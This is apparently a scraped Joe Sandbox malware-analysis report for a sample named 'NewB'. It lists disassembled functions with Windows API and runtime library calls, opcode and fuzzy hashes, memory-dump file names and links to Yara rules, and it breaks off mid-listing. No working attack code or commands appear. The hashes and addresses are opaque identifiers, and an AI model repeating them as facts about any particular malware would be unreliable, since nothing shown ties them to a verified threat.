Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
String ID: e
API String ID: 3804418703-4024072794
Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction ID: b86901a24f8294d1ce9755cfa9772739a192025b843601c5152308fef4d64c48
Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction Fuzzy Hash: 9611A035104105ABDB05DEA9C851FAA77A4AF32364F28C06EED16DF202DB71DD01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001C665D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,001C6652,?,?,001C661A,?,?,?), ref: 001C6672
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001C6685
FreeLibrary.KERNEL32(00000000,?,?,001C6652,?,?,001C661A,?,?,?), ref: 001C66A8

Strings

CorExitProcess, xrefs: 001C667D
mscoree.dll, xrefs: 001C666B

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 61c7fc581ed8fb2d7f9729dc256b614ad83d205b568d6969df5599d071bf1a71
Instruction ID: 18966f8ef80c69ba929545223bab66e29d6ba067e51240c03e443867577b6383
Opcode Fuzzy Hash: 61c7fc581ed8fb2d7f9729dc256b614ad83d205b568d6969df5599d071bf1a71
Instruction Fuzzy Hash: D6F08C31501269FBCB129B91DD0AF9EBBB9EF04756F140068F804A60A0CBB4CE80EB94

Uniqueness

Uniqueness Score: -1.00%

Function 001D66F9 Relevance: 7.7, APIs: 5, Instructions: 244COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00803178,00803178,?,7FFFFFFF,?,?,001D69B5,00803178,00803178,?,00803178,?,?,?,?,00803178), ref: 001D679C
__alloca_probe_16.LIBCMT ref: 001D6852
__alloca_probe_16.LIBCMT ref: 001D68E8
__freea.LIBCMT ref: 001D6953
__freea.LIBCMT ref: 001D695F

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: 63ebb0db415c57ef38038fd2fe107ca8bf05e0ad23dfdf07b22c45be81eb8b18
Instruction ID: 8880ca8e671647518fb4791362d0ca061309c2d1fa3fe3c37cc89fa2fde741c6
Opcode Fuzzy Hash: 63ebb0db415c57ef38038fd2fe107ca8bf05e0ad23dfdf07b22c45be81eb8b18
Instruction Fuzzy Hash: 0281D372D0021A9FDF259FA4C8A1EEE7BB9AF19318F19015BE904A7341D735DC40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001D4B64 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 001D4BE8
__alloca_probe_16.LIBCMT ref: 001D4CAE
__freea.LIBCMT ref: 001D4D1A

Part of subcall function 001CAA4B: HeapAlloc.KERNEL32(00000000,?,?,?,001CE43E,00000220,?,?,?,?,?,?,001C763B,?), ref: 001CAA7D

__freea.LIBCMT ref: 001D4D23
__freea.LIBCMT ref: 001D4D46

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 218255df817a4b00a26fe3afec228701ae3f15079275c16e36e6fa4732481172
Instruction ID: 1bf9f25c6dca5aeb7fc091aa75ecbf0b3c0f7c41b338189a6b1e14d9ce9ed593
Opcode Fuzzy Hash: 218255df817a4b00a26fe3afec228701ae3f15079275c16e36e6fa4732481172
Instruction Fuzzy Hash: 6651E37260061AAFEB259FA4DC81FBB37AADF64764F25412AFD0497250EB30DC5087A0

Uniqueness

Uniqueness Score: -1.00%

Function 001C6F8E Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000), ref: 001C6FB0
GetFileInformationByHandle.KERNEL32(?,?), ref: 001C700A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,001C6EC0,?,000000FF), ref: 001C7098
__dosmaperr.LIBCMT ref: 001C709F
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 001C70DC

Part of subcall function 001C7304: __dosmaperr.LIBCMT ref: 001C7339

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: 677748af8bf9c7eb42d70520c9cc582f8a53b89d2a4d388cfc05599fc9dbda39
Instruction ID: bcd29518de9460ed69503473a6d0bfa599fb089568c6867525c405b1ebb3d78b
Opcode Fuzzy Hash: 677748af8bf9c7eb42d70520c9cc582f8a53b89d2a4d388cfc05599fc9dbda39
Instruction Fuzzy Hash: 32414975904245ABCB249FB5DC45EAFBBF9EFA9300B10892DF556D2690EB70D850CB20

Uniqueness

Uniqueness Score: -1.00%

Function 001C14E5 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 001C14EC
Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 001C1537
Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 001C156A
Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 001C161A

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
String ID:
API String ID: 2092016602-0
Opcode ID: 28873c32cc96932fd1c235940180b17f400d1681cdcf8c06e0b2ab6d057beeb9
Instruction ID: 99f637d511360359abb12c65917c02269664cc56e256252228dff9725c6c3d50
Opcode Fuzzy Hash: 28873c32cc96932fd1c235940180b17f400d1681cdcf8c06e0b2ab6d057beeb9
Instruction Fuzzy Hash: 8C41B3B1A40606AFCB04DFA9C4919EDFBB5FF99310B14822DE516E7751DB30E941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001BDC23 Relevance: 7.6, APIs: 5, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 001BDC57

Part of subcall function 001B9022: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 001B9043

Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 001BDCB6
Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 001BDCDC
Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 001BDCFC
Concurrency::location::_Assign.LIBCMT ref: 001BDD49

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerThrowTraceWork
String ID:
API String ID: 1794448563-0
Opcode ID: 28c91d78778050a80bcb1da9a8ed44e34a4a1d2d6c84b4069b0d62d7f53bcd88
Instruction ID: 9bbc625111c5ae15bb15c9b4e4c030049038529ab3214893526e9a479bd2b6ff
Opcode Fuzzy Hash: 28c91d78778050a80bcb1da9a8ed44e34a4a1d2d6c84b4069b0d62d7f53bcd88
Instruction Fuzzy Hash: 69410374600210AFCF2EAB64D896BFDBB78AF55310F04409EE4469B2C2DB70AD45C791

Uniqueness

Uniqueness Score: -1.00%

Function 001B87BC Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 001B87E1

Part of subcall function 001AEBC0: _SpinWait.LIBCONCRT ref: 001AEBD8

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 001B87F5
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 001B8827
List.LIBCMT ref: 001B88AA
List.LIBCMT ref: 001B88B9

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: f0dc32728e6d296cc225f8c2dc9ea41416b8670f38c99f41b02a81d7ed33c1a9
Instruction ID: 399ef4b3164f97ccb465e191b642619ddb093842370b1747ff8c34749d86c74d
Opcode Fuzzy Hash: f0dc32728e6d296cc225f8c2dc9ea41416b8670f38c99f41b02a81d7ed33c1a9
Instruction Fuzzy Hash: C5316636D01656DBCB14EFA8C5916EDBBB4BF15B08F58406ED80277682CF31AD05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001CEF8B Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001CEFA3

Part of subcall function 001CA7F5: HeapFree.KERNEL32(00000000,00000000,?,001CF01E,?,00000000,?,?,?,001CF045,?,00000007,?,?,001CF447,?), ref: 001CA80B
Part of subcall function 001CA7F5: GetLastError.KERNEL32(?,?,001CF01E,?,00000000,?,?,?,001CF045,?,00000007,?,?,001CF447,?,?), ref: 001CA81D

_free.LIBCMT ref: 001CEFB5
_free.LIBCMT ref: 001CEFC7
_free.LIBCMT ref: 001CEFD9
_free.LIBCMT ref: 001CEFEB

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1f602acb8e29dd636c33edb0203af060d61acb66cd71de9dc239cfcc4c31fa79
Instruction ID: 9aa6bfb8e6de62c2e0d684f3ffdce5291ea1c6f159b840ecffbce82795855eb5
Opcode Fuzzy Hash: 1f602acb8e29dd636c33edb0203af060d61acb66cd71de9dc239cfcc4c31fa79
Instruction Fuzzy Hash: 21F0E272608314AB8625EB68E9C6E2A77FDBB707147A4080DF409D7941DB32FDC08AA1

Uniqueness

Uniqueness Score: -1.00%

Function 001CD96F Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001CDB09

Strings

*?, xrefs: 001CD9B2

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: bfa06531d68bb13aa9952aac023c09aa681b712a07e71eca3a7ddf8cc43699c7
Instruction ID: af2766e5f25c4802607520aff22fe61bc0dd1f7ef2413d8dcfffe55bed6e27e5
Opcode Fuzzy Hash: bfa06531d68bb13aa9952aac023c09aa681b712a07e71eca3a7ddf8cc43699c7
Instruction Fuzzy Hash: 57612C75D042199FCB14DFA8D881AADFBF5EF68310B25816EE805E7340D771EE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 001BAF58 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

List.LIBCONCRT ref: 001BAFDD
std::invalid_argument::invalid_argument.LIBCONCRT ref: 001BB002
Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 001BB041

Strings

pExecutionResource, xrefs: 001BAFFA

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
String ID: pExecutionResource
API String ID: 1772865662-359481074
Opcode ID: d18fc3310cd45773eea2f5b3fdb4af212fe04f11d7c7394fa0b4381e93e63335
Instruction ID: cdb283f4eecf5822f479ff6343902894361ee5e4bbb95327fa36e05d691a041e
Opcode Fuzzy Hash: d18fc3310cd45773eea2f5b3fdb4af212fe04f11d7c7394fa0b4381e93e63335
Instruction Fuzzy Hash: 8321AB756406059BCB05EF94C892BFDB7B5BFA8300F10402DF50267682DBB4EE458B95

Uniqueness

Uniqueness Score: -1.00%

Function 001BA1E1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 001BA1F5
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 001BA219
std::invalid_argument::invalid_argument.LIBCONCRT ref: 001BA22C

Strings

pScheduler, xrefs: 001BA224

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 246774199-923244539
Opcode ID: 497c958f5ec872f88b055a2d3d9efeeb6d3d8f702608ea2c7e1a019a3ffad2f7
Instruction ID: fd37fa59fbe1f4156f034b719707f41e2f8fa9e79b17d9a61a92f7275dc46115
Opcode Fuzzy Hash: 497c958f5ec872f88b055a2d3d9efeeb6d3d8f702608ea2c7e1a019a3ffad2f7
Instruction Fuzzy Hash: 1AF02E39500604A7C735FA54EC42CDEF3799EA5720754416DF51263191DF72AE06C6D2

Uniqueness

Uniqueness Score: -1.00%

Function 00196D40 Relevance: 6.4, APIs: 4, Instructions: 388libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,86BBC188), ref: 00196DBA
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00196E1B
GetProcAddress.KERNEL32(00000000), ref: 00196E22
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00196EE7

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: AddressHandleInfoModuleProcSystemVersion
String ID:
API String ID: 1456109104-0
Opcode ID: 5725191fa98f22b11d9ec71685a67188552d8a7d6e9cccc91b5478e9c83dced8
Instruction ID: cd9f73d8280f0b5171807a62898f0d88ef7f050e5cbc1c7e1d8e703306d4a2ff
Opcode Fuzzy Hash: 5725191fa98f22b11d9ec71685a67188552d8a7d6e9cccc91b5478e9c83dced8
Instruction Fuzzy Hash: 8AD11375E14214ABDF14FB68DC463BD7B72AB52324F904288E415AB3C2DB758F808BD2

Uniqueness

Uniqueness Score: -1.00%

Function 001CCA41 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 001CCAC8

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: c52e5e0c72fadff6e7b5a2cde62430417af89455091c645d67e4f798d900d942
Instruction ID: 82485a0f191cba8dc3ebac2e42ba169ea3d9203600a7e306be0a0270a7beb0b1
Opcode Fuzzy Hash: c52e5e0c72fadff6e7b5a2cde62430417af89455091c645d67e4f798d900d942
Instruction Fuzzy Hash: 0BB1E0329002469FDB15CFA8C891BBEBBA5EF75350F1481AEE459AB241D734DD01CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 001C513E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 001C5205
___AdjustPointer.LIBCMT ref: 001C5228
___AdjustPointer.LIBCMT ref: 001C52C4

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 315e056e20948868ed45847d01871a11f6c861ebc703c798d28f98f9e776d750
Instruction ID: 2b1f463ffbadccf0a10ae897b9f7daa18727a0c2dd31c5afa7596d106a1d225d
Opcode Fuzzy Hash: 315e056e20948868ed45847d01871a11f6c861ebc703c798d28f98f9e776d750
Instruction Fuzzy Hash: D051AD72605A02DFEB298F54D845FAAB7E6EF70710F18852DE8024A291E731FD80C790

Uniqueness

Uniqueness Score: -1.00%

Function 001C4D05 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 001C4D56
TypeidsEqual.LIBVCRUNTIME ref: 001C4D7B
PMDtoOffset.LIBCMT ref: 001C4D91
PMDtoOffset.LIBCMT ref: 001C4E12

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction ID: a774db3f586147fb5246093c8ca9d0c763f202a90eb2e1a21c0620157c48622c
Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction Fuzzy Hash: D6519A359082099FDF25CFA8C4A0AEEBBF4FF65310F16449EE851A7251D336E904CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001D5F1E Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001D5FEE
_free.LIBCMT ref: 001D6017
SetEndOfFile.KERNEL32(00000000,001D195A,00000000,001CA692,?,?,?,?,?,?,?,001D195A,001CA692,00000000), ref: 001D6049
